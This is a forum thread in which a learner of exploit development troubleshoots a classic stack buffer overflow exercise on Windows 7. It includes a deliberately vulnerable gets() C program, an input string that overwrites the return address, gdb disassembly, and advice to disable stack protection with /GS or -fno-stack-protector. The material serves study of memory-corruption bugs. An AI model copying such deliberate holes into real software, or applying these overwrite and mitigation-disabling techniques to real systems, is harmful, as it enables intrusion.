Stack Based Buffer Overflow not working Win 7

[maboroshi]

Trying to figure out why this isn't working on Windows 7

Code: Select all

#include <stdio.h>

void return_input(void)
{
	char array[30];
	gets(array);
	printf("%s\n", array);
}

main()
{
	return_input();
	return 0;
}

Code: Select all

C:\test>printf "AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD\xb5\x13\x40\x00" | first.exe

Here is the output of gdb so you can see I have the right hex code attached to to the end of the string

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\maboroshi>cd C:\test

C:\test>gdb first.exe

Reading symbols from c:\test\first.exe...done.
(gdb) disas main
Dump of assembler code for function main:
0x004013aa <+0>: push %ebp
0x004013ab <+1>: mov %esp,%ebp
0x004013ad <+3>: and $0xfffffff0,%esp
0x004013b0 <+6>: call 0x4018e0 <__main>
0x004013b5 <+11>: call 0x40138c <return_input>
0x004013ba <+16>: mov $0x0,%eax
0x004013bf <+21>: leave
0x004013c0 <+22>: ret
0x004013c1 <+23>: nop
0x004013c2 <+24>: nop
0x004013c3 <+25>: nop
End of assembler dump.
(gdb)

What it should do is output the string twice it only does it once then it crashes. Not sure if this is cause of some windows protection.

Any ideas

*cheers

Mabo

[Gogeta70]

I don't understand what you're asking...

[ayu]

What compiler are you using?

If you are using Visual Studio, then remove /GS to make it not protect against buffer overflows.

[maboroshi]

Thanks Cats!

using GCC on windows

is there a way of doing that in GCC?

Edit * Found the flag maybe I am not using the right hex characters

the flag is -fno-stack-protector

But its still not outputing correctly oh well for now

*cheers

[Gogeta70]

You want to explain what you're trying to do?

All i can really tell is that you want to induce a buffer overflow...

[maboroshi]

Sorry Gogeta

Yes I have written C Code that should be vulnerable to a Buffer Overflow, which it is. However when I run this

Code: Select all

C:\test>printf "AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD\xb5\x13\x40\x00" | first.exe

A window appears saying This Program has encountered an error etc. The standard windows message do you wish to report it

what should happen is this

AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD
AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD

But I am only getting one line of text and one do you wish to report message

AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD

I am trying to learn exploit Dev and was using the Shellcoders handbook for examples.

Any ideas are greatly appreciated

*cheers

[Gogeta70]

This is what's confusing me:

Code: Select all

printf "AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD\xb5\x13\x40\x00" | first.exe

Are you trying to start your program from the console that way? If so, then that's your problem.

[ayu]

Yeah I think Gog is right ... that will be interpreted as ASCII and not HEX I believe.

[intern3t]

hes learning buffer overflows on windows.maybe he wants to be an application hacker.

[maboroshi]

This is what's confusing me:

Code: Select all

printf "AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD\xb5\x13\x40\x00" | first.exe

Are you trying to start your program from the console that way? If so, then that's your problem.

Hmm then how would you execute your own code using the overflow then?

[Gogeta70]

Well, with your code, once you start the program it waits for input and then moves all input into a buffer of 30 bytes. The problem is that it's difficult to input most non-printable characters via the command line, so i would just do something like this:

Code: Select all

#include <stdio.h>

void return_input(void)
{

   unsigned char copy[] = "AAAAAAAAAABBBBBBBBBCCCCCCCCCCCCCDDDDDDD\xb5\x13\x40\x00";
   char array[30] = {0};

   int i = 0;
   for(; copy[i] != 0; i++)
   {
      array[i] = copy[i];
   }
   array[i] = 0;

   printf("%s\n", array);
}

main()
{
   return_input();
   return 0;
}

This should have the same effect that you're going for, though i haven't tried to compile or test it.

[Gogeta70]

So, did that work for you?

[maboroshi]

I honestly haven't tried it yet. But I will right now

But I am a bit confused why are you adding the overflow in the function itself? Doesn't that kind of defeat the purpose.

The C Code I wrote has a buffer overflow in it, the idea that I want is to take control of the execution.

Anyway

*cheers

I appreciate the help

Mabo

[ayu]

I honestly haven't tried it yet. But I will right now

But I am a bit confused why are you adding the overflow in the function itself? Doesn't that kind of defeat the purpose.

The C Code I wrote has a buffer overflow in it, the idea that I want is to take control of the execution.

Anyway

*cheers

I appreciate the help

Mabo

Indeed that's correct ... but since you can't get it to work properly, I think you should try what Gog said, as it can help you to solve that part of the problem faster if you do it in the code.
So, to clear it out a bit, make it work like that, and then when you manage to get the effect you want, move to trying to input data from stdin and get the same effect again